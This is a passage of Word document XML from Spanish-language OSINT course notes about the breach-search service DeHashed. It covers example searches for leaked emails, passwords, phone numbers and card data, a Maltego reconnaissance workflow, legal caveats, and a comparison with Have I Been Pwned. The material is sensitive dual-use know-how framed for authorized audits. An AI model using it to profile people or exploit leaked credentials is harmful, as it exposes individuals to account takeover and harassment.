          <w:p w14:paraId="52C8ECFD" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Recopilar información durante la fase de reconocimiento</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01387543" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Encontrar contraseñas hasheadas que podrían ser crackeadas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DF74C86" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Identificar patrones en las contraseñas utilizadas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="433FB1EF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4. Investigaciones Forenses</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D99E993" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Rastrear actividad de usuarios específicos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14A29EBF" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Conectar diferentes identidades digitales</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DB0C00E" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Encontrar evidencia en casos de ciberseguridad</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40C4BB8B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Ejemplo Práctico de Uso:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="565B90E5" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Imagina que estás realizando una auditoría de seguridad para una empresa llamada "TechCorp":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11D29363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Búsqueda 1: Por dominio</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="566CE98C" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Buscar: @techcorp.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B487C9F" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Resultado: Encuentra todos los emails corporativos filtrados</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16E1B4A9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Búsqueda 2: Por nombre de usuario</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BDC6326" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Buscar: john.smith</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00D4AC02" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Resultado: Encuentra todas las cuentas asociadas a ese usuario</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79D77E4C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Búsqueda 3: Por dirección IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B1524F1" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Buscar: 192.168.1.100</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5537162E" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Resultado: Encuentra registros asociados a esa IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D5ABA61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Búsqueda 4: Por número de teléfono</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CACE2A5" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Buscar: +1234567890</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F7FB1C0" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:t>Resultado: Encuentra cuentas vinculadas a ese teléfono</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10D2FC7A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Tipos de Información que puedes encontrar:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="092C9330" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✉️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Emails</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E175B21" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🔑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Contraseñas</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:t xml:space="preserve"> (hasheadas o en texto plano)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="310FA76E" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>👤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Nombres completos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4096E168" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>📱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Números de teléfono</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77522054" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🏠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Direcciones físicas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24AF36A5" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🌐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Direcciones IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70D022CB" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🔗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Nombres de usuario</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BD3B131" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>💳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Información de tarjetas</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:t xml:space="preserve"> (en algunos casos)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="034190ED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Integración con Maltego:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05618BC6" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:t>DeHashed se puede integrar con Maltego para:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A3BDCD6" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Automatizar búsquedas</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:t xml:space="preserve"> de información comprometida</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3593C72A" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Crear mapas de relaciones</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:t xml:space="preserve"> entre datos filtrados</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="014C6125" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Visualizar conexiones</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:t xml:space="preserve"> entre diferentes identidades digitales</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A376E94" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Generar reportes</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:t xml:space="preserve"> de exposición de datos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B9A0F10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b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Ejemplo de Flujo de Trabajo OSINT:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1040C251" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:t>1. Identificar objetivo → ejemplo: empresa "XYZ Corp"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F6B4750" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:t>2. Buscar en DeHashed → @xyzcorp.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="719B9024" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:lastRenderedPageBreak/>
              <w:t>3. Recopilar emails encontrados → 50 correos expuestos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77F5AB3D" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:t>4. Exportar a Maltego → crear entidades de email</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26B72E3C" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:t>5. Ejecutar transformaciones → encontrar redes sociales, dominios, etc.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C757D00" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:t>6. Analizar patrones → contraseñas débiles, reutilización</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22495499" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:t>7. Generar reporte → presentar hallazgos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="723F4520" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>⚠️</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Consideraciones Legales:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="004BCAC6" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IMPORTANTE:</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:t xml:space="preserve"> El uso de DeHashed debe ser </w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ético y legal</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76AEC200" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:t xml:space="preserve"> Usar para auditorías autorizadas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2955836C" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:t xml:space="preserve"> Investigaciones de seguridad legítimas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="509F8D0A" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:t xml:space="preserve"> Pruebas de penetración con permiso</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13F2AB6D" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>❌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NO</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:t xml:space="preserve"> usar para actividades ilegales</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FA73290" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>❌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NO</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:t xml:space="preserve"> acceder a cuentas sin autorización</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C4BA078" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>NO</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51F4C">
              <w:t xml:space="preserve"> usar para acoso o extorsión</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C57F37B" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B51F4C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Diferencia con Have I Been Pwned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1"/>
              <w:gridCol w:w="2078"/>
              <w:gridCol w:w="2823"/>
            </w:tblGrid>
            <w:tr w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w14:paraId="18ED77E1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24B85D" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F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51F4C">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>Característ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C172DE" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F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51F4C">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>Have I Been Pwn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60997F" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F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51F4C">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>DeHashed</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w14:paraId="20DB1F3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1CA4F0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t>Verifica si email fue filtr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07FDB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Grati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5A0EB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Gratis</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w14:paraId="3F0A4D3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9D555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t>Muestra qué brech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9C883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S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DE30FE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Sí</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w14:paraId="5818D7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417274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t>Muestra contraseñas filtrad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D09173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❌</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00B51F4C"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68C34B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Sí (requiere suscripción)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w14:paraId="4840837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FB9F2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t>Búsqueda por user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2D4A82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❌</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00B51F4C"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905602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Sí</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w14:paraId="26296C2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FF2B23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t>Búsqueda por teléfo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6DA8B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❌</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00B51F4C"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9AF802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Sí</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w14:paraId="54188A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25C3CB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t>API disponi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D5171E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S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4A19A" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B51F4C">
                    <w:rPr>
                      <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                    </w:rPr>
                    <w:t>✅</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00B51F4C">
                    <w:t xml:space="preserve"> Sí</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="4C8B1BBA" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRPr="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00B51F4C">
            <w:r w:rsidRPr="00B51F4C">
              <w:t>¿Te gustaría que te muestre cómo integrar DeHashed con Maltego para crear un flujo de investigación OSINT completo?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E79D5B1" w14:textId="77777777" w:rsidR="00B51F4C" w:rsidRDefault="00B51F4C" w:rsidP="00C35F29"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="152DD9BF" w14:textId="77777777" w:rsidR="008A3414" w:rsidRDefault="008A3414" w:rsidP="00C35F29"/>
    <w:p w14:paraId="0EDEB00C" w14:textId="740AB668" w:rsidR="0087644C" w:rsidRDefault="0087644C" w:rsidP="00C35F29">
      <w:r w:rsidRPr="0087644C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A04BAF3" wp14:editId="0F6C26A8">
            <wp:extent cx="6858000" cy="2549525"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="31102449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24494" name="Imagen 1" descr="Captura de pantalla de un videojuego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F38" w14:textId="77777777" w:rsidR="002668D6" w:rsidRDefault="002668D6" w:rsidP="00C35F29"/>
    <w:p w14:paraId="76569ADA" w14:textId="77777777" w:rsidR="002668D6" w:rsidRDefault="002668D6" w:rsidP="00C35F29"/>
    <w:p w14:paraId="7EDAC56C" w14:textId="77777777" w:rsidR="002668D6" w:rsidRDefault="002668D6" w:rsidP="00C35F29"/>
    <w:p w14:paraId="627CD3B5" w14:textId="77777777" w:rsidR="002668D6" w:rsidRDefault="002668D6" w:rsidP="00C35F29"/>
    <w:p w14:paraId="53C33239" w14:textId="77777777" w:rsidR="002668D6" w:rsidRDefault="002668D6" w:rsidP="00C35F29"/>
    <w:p w14:paraId="4C2ACB32" w14:textId="77777777" w:rsidR="002668D6" w:rsidRDefault="002668D6" w:rsidP="00C35F29"/>
    <w:p w14:paraId="77871D91" w14:textId="50A34B52" w:rsidR="002668D6" w:rsidRDefault="002668D6" w:rsidP="002668D6">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002668D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.9.3 Investigar sobre una compañía</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF805E7" w14:textId="76972F63" w:rsidR="002668D6" w:rsidRPr="002668D6" w:rsidRDefault="00E26DE7" w:rsidP="002668D6">
      <w:r w:rsidRPr="00E26DE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2101D670" wp14:editId="6FEF59BC">
            <wp:extent cx="6858000" cy="2407920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="116874649" name="Imagen 1" descr="Un mapa de un lugar con niev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4649" name="Imagen 1" descr="Un mapa de un lugar con nieve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7DC0" w14:textId="2D9D305D" w:rsidR="002668D6" w:rsidRDefault="002668D6" w:rsidP="00C35F29">
      <w:r w:rsidRPr="002668D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="019383BC" wp14:editId="2D61BE93">
            <wp:extent cx="6858000" cy="2955290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1285520737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0737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2794" w14:paraId="410BB241" w14:textId="77777777" w:rsidTr="00562794">
        <w:tc>
